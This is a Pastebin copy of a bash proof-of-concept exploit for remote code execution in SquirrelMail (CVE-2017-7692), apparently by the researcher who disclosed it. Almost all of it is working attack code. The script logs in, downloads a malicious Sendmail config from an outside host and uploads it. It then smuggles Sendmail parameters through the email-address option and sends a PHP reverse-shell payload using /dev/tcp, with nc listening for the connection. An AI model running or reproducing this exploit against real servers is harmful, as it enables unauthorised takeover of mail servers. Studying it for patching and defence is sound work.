Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Quick and messy PoC for SquirrelMail webmail application.
- # It contains payloads for 2 vectors:
- # * File Write
- # * RCE
- # It requires user credentials and that SquirrelMail uses
- # Sendmail method as email delivery transport
- #
- #
- # Full advisory URL:
- # https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
- #
- # Tested on: # Ubuntu 16.04
- # squirrelmail package version:
- # 2:1.4.23~svn20120406-2ubuntu1.16.04.1
- #
- # Disclaimer:
- # For testing purposes only
- #
- #
- # -----------------------------------------------------------------
- #
- # Interested in vulns/exploitation?
- # Stay tuned for my new project - ExploitBox
- #
- # .;lc'
- # .,cdkkOOOko;.
- # .,lxxkkkkOOOO000Ol'
- # .':oxxxxxkkkkOOOO0000KK0x:'
- # .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
- # ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.
- # '';ldxxxxxdc,. ,oOXXXNNNXd;,.
- # .ddc;,,:c;. ,c: .cxxc:;:ox:
- # .dxxxxo, ., ,kMMM0:. ., .lxxxxx:
- # .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:
- # .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:
- # .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:
- # .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:
- # .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:
- # .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:
- # .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:
- # .dxxxxxdl;. ., .. .;cdxxxxxx:
- # .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:
- # .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.
- # .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
- # .':oxxxxxxxxx.ckkkkkkkkxl,.
- # .,cdxxxxx.ckkkkkxc.
- # .':odx.ckxl,.
- # .,.'.
- #
- # https://ExploitBox.io
- #
- # https://twitter.com/Exploit_Box
- #
- # -----------------------------------------------------------------
- sqspool="/var/spool/squirrelmail/attach/"
- echo -e "$int"
- #echo -e "\033[94m \nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \n"
- #echo -e "SquirrelMail_RCE_exploit.sh (ver. 1.0)\n"
- #echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m\n\n"
- # Base URL
- if [ $# -ne 1 ]; then
- echo -e "Usage: \n$0 SquirrelMail_URL"
- echo -e "Example: \n$0 http://target/squirrelmail/ \n"
- exit 2
- fi
- URL="$1"
- # Log in
- echo -e "\n[*] Enter SquirrelMail user credentials"
- read -p "user: " squser
- read -sp "pass: " sqpass
- echo -e "\n\n[*] Logging in to SquirrelMail at $URL"
- curl -s -D /tmp/sqdata -d"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1" $URL/src/redirect.php | grep -q incorrect
- if [ $? -eq 0 ]; then
- echo "Invalid creds"
- exit 2
- fi
- sessid="`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"
- keyid="`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"
- # Prepare Sendmail cnf
- #
- # * The config will launch php via the following stanza:
- #
- # Mlocal, P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,
- # T=DNS/RFC822/X-Unix,
- # A=php -- $u $h ${client_addr}
- #
- wget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf
- # Upload config
- echo -e "\n\n[*] Uploading Sendmail config"
- token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/compose.php?mailbox=INBOX&startMessage=1" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"
- attachid="`curl -H "Expect:" -s -b"SQMSESSID=$sessid; key=$keyid" -F"smtoken=$token" -F"send_to=$mail" -F"subject=attach" -F"body=test" -F"attachfile=@/tmp/smcnf-exp" -F"username=$squser" -F"attach=Add" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'"' '{print $2}' | tr -d '\n'`"
- if [ ${#attachid} -lt 32 ]; then
- echo "Something went wrong. Failed to upload the sendmail file."
- exit 2
- fi
- # Create Sendmail cmd string according to selected payload
- echo -e "\n\n[?] Select payload\n"
- # SELECT PAYLOAD
- echo "1 - File write (into /tmp/sqpoc)"
- echo "2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)"
- echo
- read -p "[1-2] " pchoice
- case $pchoice in
- 1) payload="$squser@localhost -oQ/tmp/ -X/tmp/sqpoc"
- ;;
- 2) payload="$squser@localhost -oQ/tmp/ -C$sqspool/$attachid"
- ;;
- esac
- if [ $pchoice -eq 2 ]; then
- echo
- read -p "Reverese shell IP: " reverse_ip
- read -p "Reverese shell PORT: " reverse_port
- fi
- # Reverse shell code
- phprevsh="
- <?php
- \$cmd = \"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\";
- file_put_contents(\"/tmp/cmd\", 'export PATH=\"\$PATH\" ; export TERM=vt100 ;' . \$cmd);
- system(\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\");
- ?>"
- # Set sendmail params in user settings
- echo -e "\n[*] Injecting Sendmail command parameters"
- token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"
- curl -s -b"SQMSESSID=$sessid; key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" --data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/null
- if [ $? -ne 0 ]; then
- echo "Failed to inject sendmail parameters"
- exit 2
- fi
- # Send email which triggers the RCE vuln and runs phprevsh
- echo -e "\n[*] Sending the email to trigger the vuln"
- (sleep 2s && curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid; key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" \
- -d"send_to=$squser@localhost" -d"subject=poc" --data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) &
- if [ $pchoice -eq 2 ]; then
- echo -e "\n[*] Waiting for shell on $reverse_ip port $reverse_port"
- nc -vv -l -p $reverse_port
- else
- echo -e "\n[*] The test file should have been written at /tmp/sqpoc"
- fi
- grep -q "302 Found" /tmp/sheaders
- if [ $? -eq 1 ]; then
- echo "There was a problem with sending email"
- exit 2
- fi
- # Done
- echo -e "\n[*] All done. Exiting"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement